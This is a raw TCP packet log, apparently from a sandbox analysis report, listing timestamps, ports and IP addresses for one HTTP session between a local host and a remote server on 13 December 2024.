                                              Dec 13, 2024 17:57:35.155361891 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.157212973 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.157260895 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.157279015 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.157319069 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.158910990 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.158958912 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.158999920 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.159038067 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.160893917 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.160934925 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.161026001 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.161068916 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.162763119 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.162811041 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.162828922 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.162872076 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.164645910 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.164694071 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.164766073 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.164808989 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.166711092 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.166755915 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.166821003 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.166862011 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.168565035 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.168613911 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.168663025 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.168704033 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.170448065 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.170494080 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.170530081 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.170566082 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.172298908 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.172346115 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.172472000 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.172516108 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.174216032 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.174264908 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.283579111 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.283672094 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.283804893 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.283847094 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.284384012 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.284435034 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.284584045 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.285938025 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.285986900 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.286478996 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.286525965 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.286587000 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.286627054 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.288083076 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.288129091 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.288250923 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.288295984 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.289690971 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.289736032 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.289776087 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.289814949 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.291157007 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.291210890 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.291215897 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.291259050 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.292748928 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.292795897 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.292886972 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.292936087 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.294259071 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.294302940 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.294523954 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.294567108 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.295741081 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.295784950 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.295841932 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.295880079 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.297235012 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.297278881 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.297349930 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.297388077 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.298754930 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.298800945 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.298840046 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.298876047 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.300297022 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.300368071 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.300415993 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.300453901 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.301868916 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.301917076 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.301932096 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.301970005 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.303309917 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.303366899 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.303455114 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.303502083 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.304891109 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.304939032 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.304972887 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.305010080 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.306418896 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.306463957 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.306597948 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.306639910 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.307996988 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.308047056 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.308120966 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.308161020 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.309396029 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.309436083 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.309472084 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.309508085 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.310904980 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.310955048 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.310987949 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.311024904 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.312423944 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.312472105 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.312515974 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.312550068 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.313927889 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.313976049 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.314002037 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.314037085 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.315455914 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.315500975 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.315604925 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.315648079 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.317004919 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.317050934 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.317145109 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.317190886 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.318510056 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.318557024 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.318686962 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.318748951 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.320024967 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.320070982 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.320111036 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.320154905 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.321559906 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.321607113 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.321664095 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.321703911 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.323065996 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.323136091 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.323204041 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.323246956 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.324619055 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.324666023 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.324743032 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.324805021 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.326100111 CET804970493.125.99.121192.168.2.5
                                              Dec 13, 2024 17:57:35.326147079 CET4970480192.168.2.593.125.99.121
                                              Dec 13, 2024 17:57:35.326168060 CET804970493.125.99.121192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 13, 2024 17:57:35.326205015 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.327656984 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.327703953 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.327718019 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.327755928 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.329179049 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.329225063 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.329318047 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.329360008 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.330689907 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.330737114 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.330782890 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.330820084 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.332164049 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.332212925 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.332257032 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.332293034 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.333750010 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.333794117 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.333865881 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.333903074 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.335243940 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.335292101 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.335342884 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.335381031 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.336771965 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.336821079 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.336910009 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.336954117 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.338303089 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.338346958 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.338351011 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.338382959 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.339818001 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.339865923 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.339871883 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.339910984 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.341330051 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.341378927 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.341439962 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.341481924 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.342777967 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.342930079 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.343048096 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.343048096 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.344314098 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.344367027 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.344439030 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.344479084 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.345871925 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.345887899 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.345922947 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.345937967 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.347398996 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.347446918 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.347450972 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.347482920 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.348901987 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.348962069 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.348977089 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.349013090 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.350404978 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.350452900 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.350517988 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.350558043 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.351924896 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.351974964 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.352010965 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.352050066 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.353425980 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.353476048 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.353543043 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.353583097 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.355129957 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.355179071 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.355348110 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.355391026 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.356564045 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.356611013 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.356645107 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.356682062 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.358046055 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.358097076 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.358153105 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.358190060 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.359523058 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.359570026 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.475744009 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.475850105 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.475897074 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.475939035 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.476337910 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.476489067 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.476500988 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.476536036 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.477385998 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.477443933 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.477518082 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.477561951 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.478691101 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.478744030 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.478795052 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.478835106 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.480010986 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.480071068 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.480138063 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.480178118 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.481324911 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.481379032 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.481401920 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.481437922 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.482589960 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.482645035 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.482681990 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.482726097 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.483835936 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.483894110 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.483903885 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.483941078 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.485100985 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.485152960 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.485220909 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.485268116 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.486430883 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.486474037 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.486495018 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.486521006 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.487659931 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.487720966 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.487795115 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.487838984 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.488918066 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.488971949 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.489033937 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.489084959 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.490255117 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.490318060 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.490387917 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.490438938 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.491563082 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.491615057 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.491677999 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.491722107 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.492763996 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.492827892 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.492891073 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.492935896 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.494024992 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.494079113 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.494096041 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.494136095 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.495347977 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.495403051 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.495410919 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.495449066 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.496556044 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.496620893 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.496685028 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.496726990 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.497775078 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.497828960 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.498020887 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.498064995 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
Dec 13, 2024 17:57:35.499115944 CET | 80 | 49704 | 93.125.99.121 | 192.168.2.5
Dec 13, 2024 17:57:35.499186039 CET | 49704 | 80 | 192.168.2.5 | 93.125.99.121
